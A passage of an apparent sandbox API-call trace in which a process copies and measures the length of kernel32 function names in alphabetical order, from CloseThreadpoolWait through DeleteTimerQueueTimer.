20 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.843] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.843] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.843] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.843] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.843] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.843] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.843] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.843] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.843] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.843] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.843] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.844] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.844] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.844] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.844] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.844] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.844] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.844] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.844] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.844] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.844] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.844] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.844] lstrlenA (lpString="COPYFILEA") returned 9 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.844] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.844] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.844] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.844] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.844] lstrlenA (lpString="COPYFILEW") returned 9 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.844] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.844] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.844] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.845] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.845] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.845] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.845] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.845] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.845] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.845] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.845] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.845] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.845] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.845] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.845] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.845] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.845] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.845] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.845] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.845] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.845] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.845] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.846] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.846] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.846] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.846] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.846] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.846] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.846] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.846] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.846] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.846] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.846] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.846] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.846] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.846] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.846] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.846] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.846] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.847] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.847] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.847] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.847] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.847] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.847] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.847] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.847] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.847] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.847] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.847] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.847] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.847] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.847] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.847] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.847] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.847] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.847] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.847] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.848] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.848] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.848] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.848] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.848] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.848] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.848] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.848] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.848] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.848] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.848] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.848] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.848] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.848] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.848] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.848] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.848] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.848] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.848] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.849] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.849] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.849] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.849] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.849] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.849] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.849] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.849] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.849] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.849] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.849] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.849] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.849] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.849] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.849] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.849] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.849] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.849] lstrlenA (lpString="DELETEATOM") returned 10 [0083.849] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.850] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.850] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.850] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.850] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.850] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.850] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.850] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.850] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.850] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.850] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.850] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") 